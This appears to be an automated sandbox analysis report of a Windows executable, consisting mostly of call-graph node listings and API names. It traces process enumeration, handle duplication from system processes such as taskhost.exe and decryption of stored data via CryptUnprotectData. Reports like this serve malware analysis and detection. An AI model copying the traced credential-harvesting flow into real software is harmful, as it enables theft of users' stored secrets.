406bba _wcsicmp 38939->38938 38939->38941 38942 406be5 38940->38942 38941->38938 38941->38939 38943 40afcf ??2@YAPAXI ??3@YAXPAX 38942->38943 38942->38946 38944 406bff 38943->38944 38945 4068bf SetFilePointerEx memcpy ReadFile ??2@YAPAXI ??3@YAXPAX 38944->38945 38945->38946 38946->38879 38946->38880 38948 4069c4 ??3@YAXPAX 38947->38948 38949 4069af 38948->38949 38950 40b633 free 38949->38950 38951 4069ba 38950->38951 38952 40b04b ??3@YAXPAX 38951->38952 38953 4069c2 38952->38953 38953->38848 38954->38885 38955->38885 38956->38885 38957->38885 38960 40a980 38958->38960 38959 40a8bb 38959->38758 38959->38759 38960->38959 38961 40a995 _wcsicmp 38960->38961 38962 40a99c wcscmp 38960->38962 38961->38960 38962->38960 38963->38762 38964->38766 38966 40aa23 RegEnumValueW 38965->38966 38966->38773 38966->38774 38968 405335 38967->38968 38969 40522a 38967->38969 38968->38358 38970 40b2cc 27 API calls 38969->38970 38971 405234 38970->38971 38972 40a804 8 API calls 38971->38972 38973 40523a 38972->38973 39012 40b273 38973->39012 38975 405248 _mbscpy _mbscat GetProcAddress 38976 40b273 27 API calls 38975->38976 38977 405279 38976->38977 39015 405211 GetProcAddress 38977->39015 38979 405282 38980 40b273 27 API calls 38979->38980 38981 40528f 38980->38981 39016 405211 GetProcAddress 38981->39016 38983 405298 38984 40b273 27 API calls 38983->38984 38985 4052a5 38984->38985 39017 405211 GetProcAddress 38985->39017 38987 4052ae 38988 40b273 27 API calls 38987->38988 38989 4052bb 38988->38989 39018 405211 GetProcAddress 38989->39018 38991 4052c4 38992 40b273 27 API calls 38991->38992 38993 4052d1 38992->38993 39019 405211 GetProcAddress 38993->39019 38995 4052da 38996 40b273 27 API calls 38995->38996 38997 4052e7 38996->38997 39020 405211 GetProcAddress 38997->39020 38999 4052f0 39000 40b273 27 API calls 38999->39000 39001 4052fd 39000->39001 39021 405211 GetProcAddress 39001->39021 39003 405306 39004 40b273 27 API calls 39003->39004 39005 405313 39004->39005 39022 405211 GetProcAddress 39005->39022 39007 40531c 39013 40b58d 27 API calls 39012->39013 39014 40b18c 39013->39014 39014->38975 39015->38979 39016->38983 39017->38987 39018->38991 39019->38995 39020->38999 39021->39003 39022->39007 39025 405220 39 API calls 39024->39025 39026 405369 39025->39026 39026->38791 39026->38792 39027->38794 39028->38798 39029->38795 39030->38792 39032 40440c FreeLibrary 39031->39032 39033 40436d 39032->39033 39034 40a804 8 API calls 39033->39034 39035 404377 39034->39035 39036 404383 39035->39036 39037 404405 39035->39037 39038 40b273 27 API calls 39036->39038 39037->38364 39037->38365 39037->38369 39039 40438d GetProcAddress 39038->39039 39040 40b273 27 API calls 39039->39040 39041 4043a7 GetProcAddress 39040->39041 39042 40b273 27 API calls 39041->39042 39043 4043ba GetProcAddress 39042->39043 39044 40b273 27 API calls 39043->39044 39045 4043ce GetProcAddress 39044->39045 39046 40b273 27 API calls 39045->39046 39047 4043e2 GetProcAddress 39046->39047 39048 4043f1 39047->39048 39049 4043f7 39048->39049 39050 40440c FreeLibrary 39048->39050 39049->39037 39050->39037 39052 404413 FreeLibrary 39051->39052 39053 40441e 39051->39053 39052->39053 39053->38380 39054->38377 39056 40447e 39055->39056 39057 40442e 39055->39057 39058 404485 CryptUnprotectData 39056->39058 39059 40449c 39056->39059 39060 40b2cc 27 API calls 39057->39060 39058->39059 39059->38377 39061 404438 39060->39061 39062 40a804 8 API calls 39061->39062 39063 40443e 39062->39063 39064 404445 39063->39064 39065 404467 39063->39065 39066 40b273 27 API calls 39064->39066 39065->39056 39067 404475 FreeLibrary 39065->39067 39068 40444f GetProcAddress 39066->39068 39067->39056 39068->39065 39069 404460 39068->39069 39069->39065 39071 4135f6 39070->39071 39072 4135eb FreeLibrary 39070->39072 39071->38383 39072->39071 39074 4449c4 39073->39074 39075 444a52 39073->39075 39076 40b2cc 27 API calls 39074->39076 39075->38400 39075->38401 39077 4449cb 39076->39077 39078 40a804 8 API calls 39077->39078 39079 4449d1 39078->39079 39080 40b273 27 API calls 39079->39080 39081 4449dc GetProcAddress 39080->39081 39082 40b273 27 API calls 39081->39082 39083 4449f3 GetProcAddress 39082->39083 39084 40b273 27 API calls 39083->39084 39085 444a04 GetProcAddress 39084->39085 39086 40b273 27 API calls 39085->39086 39087 444a15 GetProcAddress 39086->39087 39094->38411 39095->38411 39096->38411 39097->38411 39098->38402 39100 403a29 39099->39100 39114 403bed memset memset 39100->39114 39102 403a2f 39103 403ae7 39102->39103 39104 403a3f memset 39102->39104 39107 409b98 GetFileAttributesW 39102->39107 39108 40a8d0 7 API calls 39102->39108 39109 409d1f 6 API calls 39102->39109 39127 40b1ab free free 39103->39127 39104->39102 39106 403aef 39106->38418 39107->39102 39108->39102 39109->39102 39111 40a051 GetFileTime CloseHandle 39110->39111 39112 4039ca CompareFileTime 39110->39112 39111->39112 39112->38418 39113->38417 39115 414c2e 17 API calls 39114->39115 39116 403c38 39115->39116 39117 409719 2 API calls 39116->39117 39118 403c3f wcscat 39117->39118 39119 414c2e 17 API calls 39118->39119 39120 403c61 39119->39120 39121 409719 2 API calls 39120->39121 39122 403c68 wcscat 39121->39122 39128 403af5 39122->39128 39125 403af5 20 API calls 39126 403c95 39125->39126 39126->39102 39127->39106 39129 403b02 39128->39129 39130 40ae18 9 API calls 39129->39130 39138 403b37 39130->39138 39131 403bdb 39132 40aebe FindClose 39131->39132 39133 403be6 39132->39133 39133->39125 39134 40ae18 9 API calls 39134->39138 39135 40ae51 9 API calls 39135->39138 39136 40add4 wcscmp wcscmp 39136->39138 39137 40aebe FindClose 39137->39138 39138->39131 39138->39134 39138->39135 39138->39136 39138->39137 39139 40a8d0 7 API calls 39138->39139 39139->39138 39141 409d1f 6 API calls 39140->39141 39142 404190 39141->39142 39155 409b98 GetFileAttributesW 39142->39155 39144 40419c 39145 4041a7 6 API calls 39144->39145 39146 40435c 39144->39146 39148 40424f 39145->39148 39146->38445 39148->39146 39149 40425e memset 39148->39149 39151 409d1f 6 API calls 39148->39151 39152 40a8ab 9 API calls 39148->39152 39156 414842 39148->39156 39149->39148 39150 404296 wcscpy 39149->39150 39150->39148 39151->39148 39153 4042b6 memset memset _snwprintf wcscpy 39152->39153 39153->39148 39154->38443 39155->39144 39159 41443e 39156->39159 39158 414866 39158->39148 39160 41444b 39159->39160 39161 414451 39160->39161 39162 4144a3 GetPrivateProfileStringW 39160->39162 39163 414491 39161->39163 39164 414455 wcschr 39161->39164 39162->39158 39165 414495 WritePrivateProfileStringW 39163->39165 39164->39163 39166 414463 _snwprintf 39164->39166 39165->39158 39166->39165 39167->38449 39169 40b2cc 27 API calls 39168->39169 39170 409615 39169->39170 39171 409d1f 6 API calls 39170->39171 39172 409625 39171->39172 39197 409b98 GetFileAttributesW 39172->39197 39174 409634 39175 409648 39174->39175 39198 4091b8 memset 39174->39198 39177 40b2cc 27 API calls 39175->39177 39179 408801 39175->39179 39178 40965d 39177->39178 39180 409d1f 6 API calls 39178->39180 39179->38452 39179->38480 39181 40966d 39180->39181 39250 409b98 GetFileAttributesW 39181->39250 39183 40967c 39183->39179 39184 409681 39183->39184 39251 409529 72 API calls 39184->39251 39186 409690 39186->39179 39197->39174 39252 40a6e6 WideCharToMultiByte 39198->39252 39200 409202 39253 444432 39200->39253 39203 40b273 27 API calls 39204 409236 39203->39204 39299 438552 39204->39299 39207 409383 39230 40951d 39230->39175 39250->39183 39251->39186 39252->39200 39349 4438b5 39253->39349 39255 44444c 39256 409215 39255->39256 39363 415a6d 39255->39363 39256->39203 39256->39230 39258 4442e6 11 API calls 39260 44469e 39258->39260 39259 444486 39261 4444b9 memcpy 39259->39261 39298 4444a4 39259->39298 39260->39256 39263 443d90 111 API calls 39260->39263 39367 415258 39261->39367 39263->39256 39264 444524 39265 444541 39264->39265 39266 44452a 39264->39266 39370 444316 39265->39370 39267 416935 16 API calls 39266->39267 39267->39298 39298->39258 39481 438460 39299->39481 39301 409240 39301->39207 39302 4251c4 39301->39302 39350 4438d0 39349->39350 39360 4438c9 39349->39360 39437 415378 memcpy memcpy 39350->39437 39360->39255 39364 415a77 39363->39364 39365 415a8d 39364->39365 39366 415a7e memset 39364->39366 39365->39259 39366->39365 39368 4438b5 11 API calls 39367->39368 39369 41525d 39368->39369 39369->39264 39371 444328 39370->39371 39372 444423 39371->39372 39373 44434e 39371->39373 39438 4446ea 11 API calls 39372->39438 39375 432d4e 3 API calls 39373->39375 39493 41703f 39481->39493 39483 43847a 39484 43848a 39483->39484 39485 43847e 39483->39485 39500 438270 39484->39500 39530 4446ea 11 API calls 39485->39530 39489 438488 39489->39301 39494 417044 39493->39494 39495 41705c 39493->39495 39497 416760 11 API calls 39494->39497 39499 417055 39494->39499 39496 417075 39495->39496 39498 41707a 11 API calls 39495->39498 39496->39483 39497->39499 39498->39494 39499->39483 39501 415a91 memset 39500->39501 39502 43828d 39501->39502 39504 438341 39502->39504 39530->39489 39620 413f4f 39593->39620 39596 413f37 K32GetModuleFileNameExW 39597 413f4a 39596->39597 39597->38507 39599 413969 wcscpy 39598->39599 39600 41396c wcschr 39598->39600 39610 413a3a 39599->39610 39600->39599 39602 41398e 39600->39602 39625 4097f7 wcslen wcslen _memicmp 39602->39625 39604 41399a 39605 4139a4 memset 39604->39605 39606 4139e6 39604->39606 39626 409dd5 GetWindowsDirectoryW wcscpy 39605->39626 39608 413a31 wcscpy 39606->39608 39609 4139ec memset 39606->39609 39608->39610 39627 409dd5 GetWindowsDirectoryW wcscpy 39609->39627 39610->38507 39611 4139c9 wcscpy wcscat 39611->39610 39613 413a11 memcpy wcscat 39613->39610 39615 413cb0 GetModuleHandleW 39614->39615 39616 413cda 39614->39616 39615->39616 39619 413cbf GetProcAddress 39615->39619 39617 413ce3 GetProcessTimes 39616->39617 39618 413cf6 39616->39618 39617->38514 39618->38514 39619->39616 39621 413f2f 39620->39621 39622 413f54 39620->39622 39621->39596 39621->39597 39623 40a804 8 API calls 39622->39623 39624 413f5f GetProcAddress GetProcAddress GetProcAddress GetProcAddress GetProcAddress 39623->39624 39624->39621 39625->39604 39626->39611 39627->39613 39628->38534 39629->38557 39631 409cf9 GetVersionExW 39630->39631 39632 409d0a 39630->39632 39631->39632 39632->38564 39632->38568 39633->38572 39634->38574 39635->38576 39636->38642 39638 40bba5 39637->39638 39682 40cc26 39638->39682 39641 40bd4b 39703 40cc0c 39641->39703 39646 40b2cc 27 API calls 39647 40bbef 39646->39647 39710 40ccf0 _wcsicmp 39647->39710 39649 40bbf5 39649->39641 39711 40ccb4 6 API calls 39649->39711 39651 40bc26 39652 40cf04 17 API calls 39651->39652 39653 40bc2e 39652->39653 39654 40bd43 39653->39654 39655 40b2cc 27 API calls 39653->39655 39656 40cc0c 4 API calls 39654->39656 39657 40bc40 39655->39657 39656->39641 39712 40ccf0 _wcsicmp 39657->39712 39659 40bc46 39659->39654 39660 40bc61 memset memset WideCharToMultiByte 39659->39660 39713 40103c strlen 39660->39713 39662 40bcc0 39663 40b273 27 API calls 39662->39663 39664 40bcd0 memcmp 39663->39664 39664->39654 39665 40bce2 39664->39665 39666 404423 38 API calls 39665->39666 39667 40bd10 39666->39667 39667->39654 39668 40bd3a LocalFree 39667->39668 39669 40bd1f memcpy 39667->39669 39668->39654 39669->39668 39670->38657 39671->38693 39672->38693 39673->38693 39674->38693 39675->38693 39676->38693 39677->38693 39678->38693 39679->38693 39680->38669 39681->38690 39714 4096c3 CreateFileW 39682->39714 39684 40cc34 39685 40cc3d GetFileSize 39684->39685 39693 40bbca 39684->39693 39686 40afcf 2 API calls 39685->39686 39687 40cc64 39686->39687 39715 40a2ef ReadFile 39687->39715 39689 40cc71 39716 40ab4a MultiByteToWideChar 39689->39716 39691 40cc95 CloseHandle 39692 40b04b ??3@YAXPAX 39691->39692 39692->39693 39693->39641 39694 40cf04 39693->39694 39695 40b633 free 39694->39695 39696 40cf14 39695->39696 39722 40b1ab free free 39696->39722 39698 40bbdd 39698->39641 39698->39646 39699 40cf1b 39699->39698 39700 40cfef 39699->39700 39723 40cd4b 39699->39723 39702 40cd4b 14 API calls 39700->39702 39702->39698 39704 40b633 free 39703->39704 39705 40cc15 39704->39705 39706 40aa04 free 39705->39706 39707 40cc1d 39706->39707 39767 40b1ab free free 39707->39767 39709 40b7d4 memset CreateFileW 39709->38648 39709->38649 39710->39649 39711->39651 39712->39659 39713->39662 39714->39684 39715->39689 39717 40ab6b 39716->39717 39721 40ab93 39716->39721 39718 40a9ce 4 API calls 39717->39718 39719 40ab74 39718->39719 39720 40ab7c MultiByteToWideChar 39719->39720 39720->39721 39721->39691 39722->39699 39724 40cd7b 39723->39724 39757 40aa29 6 API calls 39724->39757 39726 40cef5 39727 40aa04 free 39726->39727 39728 40cefd 39727->39728 39728->39699 39729 40cd89 39729->39726 39758 40aa29 6 API calls 39729->39758 39731 40ce1d 39759 40aa29 6 API calls 39731->39759 39733 40ce3e 39734 40ce6a 39733->39734 39760 40abb7 wcslen memmove 39733->39760 39735 40ce9f 39734->39735 39763 40abb7 wcslen memmove 39734->39763 39738 40a8d0 7 API calls 39735->39738 39741 40ceb5 39738->39741 39739 40ce56 39761 40aa71 wcslen 39739->39761 39740 40ce8b 39764 40aa71 wcslen 39740->39764 39746 40a8d0 7 API calls 39741->39746 39744 40ce5e 39762 40abb7 wcslen memmove 39744->39762 39748 40cecb 39746->39748 39747 40ce93 39765 40abb7 wcslen memmove 39747->39765 39766 40d00b malloc memcpy free free 39748->39766 39751 40cedd 39752 40aa04 free 39751->39752 39753 40cee5 39752->39753 39754 40aa04 free 39753->39754 39755 40ceed 39754->39755 39756 40aa04 free 39755->39756 39756->39726 39757->39729 39758->39731 39759->39733 39760->39739 39761->39744 39762->39734 39763->39740 39764->39747 39765->39735 39766->39751 39767->39709 39768->38709 39769->38717 40421 441819 40424 430737 40421->40424 40423 441825 40425 430756 40424->40425 40437 43076d 40424->40437 40426 430774 40425->40426 40427 43075f 40425->40427 40439 43034a memcpy 40426->40439 40438 4169a7 11 API calls 40427->40438 40430 4307ce 40432 430819 memset 40430->40432 40440 415b2c 11 API calls 40430->40440 40431 43077e 40431->40430 40435 4307fa 40431->40435 40431->40437 40432->40437 40434 4307e9 40434->40432 40434->40437 40441 4169a7 11 API calls 40435->40441 40437->40423 40438->40437 40439->40431 40440->40434 40441->40437 40442 41493c EnumResourceNamesW 39770 4415ea 39778 4304b2 39770->39778 39772 4415fe 39773 4418ea 39772->39773 39774 4418e2 39772->39774 39777 442bd4 39772->39777 39774->39773 39825 4414a9 12 API calls 39774->39825 39777->39773 39826 441409 memset 39777->39826 39827 43041c 12 API calls 39778->39827 39780 4304cd 39785 430557 39780->39785 39828 43034a memcpy 39780->39828 39782 4304f3 39782->39785 39829 430468 11 API calls 39782->39829 39784 430506 39784->39785 39786 43057b 39784->39786 39830 43817e 39784->39830 39785->39772 39787 415a91 memset 39786->39787 39789 430584 39787->39789 39789->39785 39835 4397fd memset 39789->39835 39791 4305e4 39791->39785 39836 4328e4 12 API calls 39791->39836 39793 43052d 39793->39785 39793->39786 39796 430542 39793->39796 39795 4305fa 39797 430609 39795->39797 39837 423383 11 API calls 39795->39837 39796->39785 39834 4169a7 11 API calls 39796->39834 39838 423330 11 API calls 39797->39838 39800 430634 39839 423399 11 API calls 39800->39839 39802 430648 39840 4233ae 11 API calls 39802->39840 39804 43066b 39841 423330 11 API calls 39804->39841 39806 43067d 39842 4233ae 11 API calls 39806->39842 39808 430695 39843 423330 11 API calls 39808->39843 39810 4306d6 39845 423330 11 API calls 39810->39845 39811 4306a7 39811->39810 39813 4306c0 39811->39813 39844 4233ae 11 API calls 39813->39844 39814 4306d1 39846 430369 17 API calls 39814->39846 39817 4306f3 39847 423330 11 API calls 39817->39847 39819 430704 39848 423330 11 API calls 39819->39848 39821 430710 39849 423330 11 API calls 39821->39849 39823 43071e 39850 423383 11 API calls 39823->39850 39825->39773 39826->39777 39827->39780 39828->39782 39829->39784 39831 438187 39830->39831 39833 438192 39830->39833 39851 4380f6 39831->39851 39833->39793 39834->39785 39835->39791 39836->39795 39837->39797 39838->39800 39839->39802 39840->39804 39841->39806 39842->39808 39843->39811 39844->39814 39845->39814 39846->39817 39847->39819 39848->39821 39849->39823 39850->39785 39853 43811f 39851->39853 39852 438164 39852->39833 39853->39852 39856 437e5e 39853->39856 39879 4300e8 memset memset memcpy 39853->39879 39880 437d3c 39856->39880 39858 437eb3 39858->39853 39859 437ea9 39859->39858 39865 437f22 39859->39865 39895 41f432 39859->39895 39862 437f06 39945 415c56 11 API calls 39862->39945 39864 437f95 39946 415c56 11 API calls 39864->39946 39866 437f7f 39865->39866 39867 432d4e 3 API calls 39865->39867 39866->39864 39868 43802b 39866->39868 39867->39866 39906 4165ff 39868->39906 39874 43806b 39875 438094 39874->39875 39947 42f50e 138 API calls 39874->39947 39876 437fa3 39875->39876 39948 4300e8 memset memset memcpy 39875->39948 39876->39858 39949 41f638 104 API calls 39876->39949 39879->39853 39881 437d69 39880->39881 39884 437d80 39880->39884 39950 437ccb 11 API calls 39881->39950 39883 437d76 39883->39859 39884->39883 39885 437da3 39884->39885 39886 437d90 39884->39886 39888 438460 134 API calls 39885->39888 39886->39883 39954 437ccb 11 API calls 39886->39954 39890 437dcb 39888->39890 39894 437de8 39890->39894 39951 444283 13 API calls 39890->39951 39892 437dfc 39952 437ccb 11 API calls 39892->39952 39953 424f26 123 API calls 39894->39953 39896 41f54d 39895->39896 39899 41f44f 39895->39899 39897 41f466 39896->39897 39984 41c635 memset memset 39896->39984 39897->39862 39897->39865 39899->39897 39904 41f50b 39899->39904 39955 41f1a5 39899->39955 39980 41c06f memcmp 39899->39980 39981 41f3b1 90 API calls 39899->39981 39982 41f398 86 API calls 39899->39982 39904->39896 39904->39897 39983 41c295 86 API calls 39904->39983 39907 4165a0 11 API calls 39906->39907 39908 41660d 39907->39908 39909 437371 39908->39909 39910 41703f 11 API calls 39909->39910 39911 437399 39910->39911 39912 43739d 39911->39912 39913 4373ac 39911->39913 40071 4446ea 11 API calls 39912->40071 39915 416935 16 API calls 39913->39915 39938 4373ca 39915->39938 39916 437584 39918 4375bc 39916->39918 40078 42453e 123 API calls 39916->40078 39917 438460 134 API calls 39917->39938 39920 415c7d 16 API calls 39918->39920 39921 4375d2 39920->39921 39923 4442e6 11 API calls 39921->39923 39925 4373a7 39921->39925 39922 4251c4 137 API calls 39922->39938 39924 4375e2 39923->39924 39924->39925 40079 444283 13 API calls 39924->40079 39925->39874 39927 415a91 memset 39927->39938 39930 43758f 40077 42453e 123 API calls 39930->40077 39933 4375f4 39936 437620 39933->39936 39937 43760b 39933->39937 39935 43759f 39939 416935 16 API calls 39935->39939 39941 416935 16 API calls 39936->39941 40080 444283 13 API calls 39937->40080 39938->39916 39938->39917 39938->39922 39938->39927 39938->39930 39944 437d3c 135 API calls 39938->39944 40072 425433 13 API calls 39938->40072 40073 425413 17 API calls 39938->40073 40074 42533e 16 API calls 39938->40074 40075 42538f 16 API calls 39938->40075 40076 42453e 123 API calls 39938->40076 39939->39916 39941->39925 39943 437612 memcpy 39943->39925 39944->39938 39945->39858 39946->39876 39947->39875 39948->39876 39949->39858 39950->39883 39951->39892 39952->39894 39953->39883 39954->39883 39985 41bc3b 39955->39985 39958 41edad 86 API calls 39959 41f1cb 39958->39959 39960 41f1f5 memcmp 39959->39960 39961 41f20e 39959->39961 39965 41f282 39959->39965 39960->39961 39962 41f21b memcmp 39961->39962 39961->39965 39963 41f326 39962->39963 39966 41f23d 39962->39966 39964 41ee6b 86 API calls 39963->39964 39963->39965 39964->39965 39965->39899 39966->39963 39967 41f28e memcmp 39966->39967 40009 41c8df 56 API calls 39966->40009 39967->39963 39968 41f2a9 39967->39968 39968->39963 39971 41f308 39968->39971 39972 41f2d8 39968->39972 39970 41f269 39970->39963 39973 41f287 39970->39973 39974 41f27a 39970->39974 39971->39963 40011 4446ce 11 API calls 39971->40011 39975 41ee6b 86 API calls 39972->39975 39973->39967 39976 41ee6b 86 API calls 39974->39976 39977 41f2e0 39975->39977 39976->39965 40010 41b1ca memset __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39977->40010 39980->39899 39981->39899 39982->39899 39983->39896 39984->39897 39986 41be0b 39985->39986 39988 41bc54 39985->39988 39989 41bd61 39986->39989 40020 41ae17 34 API calls 39986->40020 39988->39986 39988->39989 40000 41bc8d 39988->40000 40012 41baf0 55 API calls 39988->40012 39991 41be45 39989->39991 40021 41a25f memset 39989->40021 39991->39958 39991->39965 39993 41be04 40019 41aee4 56 API calls 39993->40019 39995 41bd42 39995->39989 39995->39993 39996 41bdd8 memset 39995->39996 39997 41bdba 39995->39997 39998 41bde7 memcmp 39996->39998 40008 4175ed 6 API calls 39997->40008 39998->39993 40001 41bdfd 39998->40001 39999 41bd18 39999->39989 39999->39995 40017 41a9da 86 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 39999->40017 40000->39989 40000->39995 40000->39999 40013 4151e3 40000->40013 40018 41a1b0 memset 40001->40018 40004 41bdcc 40004->39989 40004->39998 40008->40004 40009->39970 40010->39965 40011->39963 40012->40000 40022 41837f 40013->40022 40016 444706 11 API calls 40016->39999 40017->39995 40018->39993 40019->39986 40020->39989 40021->39991 40023 4183c1 40022->40023 40024 4183ca 40022->40024 40069 418197 25 API calls 40023->40069 40027 4151f9 40024->40027 40043 418160 40024->40043 40027->39999 40027->40016 40028 4183e5 40028->40027 40052 41739b 40028->40052 40031 418444 CreateFileW 40033 418477 40031->40033 40032 41845f CreateFileA 40032->40033 40034 4184c2 memset 40033->40034 40035 41847e GetLastError free 40033->40035 40055 418758 40034->40055 40036 4184b5 40035->40036 40037 418497 40035->40037 40070 444706 11 API calls 40036->40070 40039 41837f 49 API calls 40037->40039 40039->40027 40044 41739b GetVersionExW 40043->40044 40045 418165 40044->40045 40047 4173e4 MultiByteToWideChar malloc MultiByteToWideChar free 40045->40047 40048 418178 40047->40048 40049 41817f 40048->40049 40050 41748f AreFileApisANSI WideCharToMultiByte malloc WideCharToMultiByte free 40048->40050 40049->40028 40051 418188 free 40050->40051 40051->40028 40053 4173d6 40052->40053 40054 4173ad GetVersionExW 40052->40054 40053->40031 40053->40032 40054->40053 40056 418680 43 API calls 40055->40056 40057 418782 40056->40057 40058 418160 11 API calls 40057->40058 40060 418506 free 40057->40060 40059 418799 40058->40059 40059->40060 40061 41739b GetVersionExW 40059->40061 40060->40027 40062 4187a7 40061->40062 40063 4187da 40062->40063 40064 4187ad GetDiskFreeSpaceW 40062->40064 40065 4187ec GetDiskFreeSpaceA 40063->40065 40068 4187e8 40063->40068 40067 418800 free 40064->40067 40065->40067 40067->40060 40068->40065 40069->40024 40070->40027 40071->39925 40072->39938 40073->39938 40074->39938 40075->39938 40076->39938 40077->39935 40078->39918 40079->39933 40080->39943

                                      Executed Functions

                                      Function 0040DD85 Relevance: 31.7, APIs: 15, Strings: 3, Instructions: 212filenativeCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 338 40dd85-40ddeb memset call 409bca CreateFileW 341 40ddf1-40de09 call 40afcf call 41352f 338->341 346 40de0b-40de1a NtQuerySystemInformation 341->346 347 40de1c 341->347 348 40de20-40de27 346->348 347->348 349 40de29-40de39 348->349 350 40de3b-40de52 CloseHandle GetCurrentProcessId 348->350 349->341 349->350 351 40de54-40de58 350->351 352 40de7a-40de8e call 413cfa call 413d4c 350->352 351->352 353 40de5a 351->353 362 40de94-40debb call 40e6ad call 409c52 _wcsicmp 352->362 363 40e00c-40e01b call 413d29 352->363 355 40de5d-40de63 353->355 357 40de74-40de78 355->357 358 40de65-40de6c 355->358 357->352 357->355 358->357 360 40de6e-40de71 358->360 360->357 370 40dee7-40def7 OpenProcess 362->370 371 40debd-40dece _wcsicmp 362->371 373 40dff8-40dffb 370->373 374 40defd-40df02 370->374 371->370 372 40ded0-40dee1 _wcsicmp 371->372 372->370 375 40dffd-40e006 372->375 373->363 373->375 376 40df08 374->376 377 40dfef-40dff2 CloseHandle 374->377 375->362 375->363 378 40df0b-40df10 376->378 377->373 379 40df16-40df1d 378->379 380 40dfbd-40dfcb 378->380 379->380 382 40df23-40df4a GetCurrentProcess DuplicateHandle 379->382 380->378 381 40dfd1-40dfd3 380->381 381->377 382->380 383 40df4c-40df76 memset call 41352f 382->383 386 40df78-40df8a 383->386 387 40df8f-40dfbb CloseHandle call 409c52 * 2 _wcsicmp 383->387 386->387 387->380 392 40dfd5-40dfed 387->392 392->377
                                      APIs
                                      • memset.MSVCRT ref: 0040DDAD
                                        • Part of subcall function 00409BCA: GetModuleFileNameW.KERNEL32(00000000,00000208,00000104,0040DCE6,00000000,0040DB99,?,00000000,00000208,?), ref: 00409BD5
                                      • CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                        • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000000,00000000,0040B608), ref: 0040AFD8
                                        • Part of subcall function 0041352F: GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(00000000,NtQuerySystemInformation), ref: 00413559
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtLoadDriver), ref: 0041356B
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtUnloadDriver), ref: 0041357D
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtOpenSymbolicLinkObject), ref: 0041358F
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQuerySymbolicLinkObject), ref: 004135A1
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtQueryObject), ref: 004135B3
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtSuspendProcess), ref: 004135C5
                                        • Part of subcall function 0041352F: GetProcAddress.KERNEL32(NtResumeProcess), ref: 004135D7
                                      • NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                      • CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                      • GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                      • _wcsicmp.MSVCRT ref: 0040DEB2
                                      • _wcsicmp.MSVCRT ref: 0040DEC5
                                      • _wcsicmp.MSVCRT ref: 0040DED8
                                      • OpenProcess.KERNEL32(00000040,00000000,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DEEC
                                      • GetCurrentProcess.KERNEL32(C0000004,80000000,00000000,00000002,?,000000FF,00000000,00000104), ref: 0040DF32
                                      • DuplicateHandle.KERNELBASE(00000104,?,00000000,?,000000FF,00000000,00000104), ref: 0040DF41
                                      • memset.MSVCRT ref: 0040DF5F
                                      • CloseHandle.KERNEL32(C0000004,?,?,?,?,000000FF,00000000,00000104), ref: 0040DF92
                                      • _wcsicmp.MSVCRT ref: 0040DFB2
                                      • CloseHandle.KERNEL32(00000104,?,000000FF,00000000,00000104), ref: 0040DFF2
                                      Strings
                                      Memory Dump Source
                                      • Source File: 0000000B.00000002.3215263179.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 0000000B.00000002.3215263179.0000000000459000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.000000000045D000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      • Associated: 0000000B.00000002.3215263179.0000000000473000.00000040.80000000.00040000.00000000.sdmpDownload File
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_11_2_400000_Conspect124.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle$_wcsicmp$CloseProcess$CurrentFileModulememset$??2@CreateDuplicateInformationNameOpenQuerySystem
                                      • String ID: dllhost.exe$taskhost.exe$taskhostex.exe
                                      • API String ID: 708747863-3398334509
                                      • Opcode ID: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                      • Instruction ID: 75e999e9478e2cd8c236028a88c267773407d5e0538ee9298daa3020847ac7a6
                                      • Opcode Fuzzy Hash: 5cab624b8928eaf00a06d38b2ee3d6eb31f92f98f3d88623932f7a2009947366
                                      • Instruction Fuzzy Hash: 57818F71D00209AFEB10EF95CC81AAEBBB5FF04345F20407AF915B6291DB399E95CB58
                                      Function 00413D4C Relevance: 22.9, APIs: 11, Strings: 2, Instructions: 142processlibraryloaderCOMMON
                                      Download Yara Rule

                                      Control-flow Graph

                                      • Executed
                                      • Not Executed
                                      control_flow_graph 577 413d4c-413da0 call 40b633 CreateToolhelp32Snapshot memset Process32FirstW 580 413f00-413f11 Process32NextW 577->580 581 413da5-413ded OpenProcess 580->581 582 413f17-413f24 CloseHandle 580->582 583 413eb0-413eb5 581->583 584 413df3-413e26 memset call 413f27 581->584 583->580 585 413eb7-413ebd 583->585 592 413e79-413e9d call 413959 call 413ca4 584->592 593 413e28-413e35 584->593 587 413ec8-413eda call 4099f4 585->587 588 413ebf-413ec6 free 585->588 590 413edb-413ee2 587->590 588->590 597 413ee4 590->597 598 413ee7-413efe 590->598 604 413ea2-413eae CloseHandle 592->604 595 413e61-413e68 593->595 596 413e37-413e44 GetModuleHandleW 593->596 595->592 601 413e6a-413e76 595->601 596->595 600 413e46-413e5c GetProcAddress 596->600 597->598 598->580 600->595 601->592 604->583
                                      APIs
                                        • Part of subcall function 0040B633: free.MSVCRT ref: 0040B63A
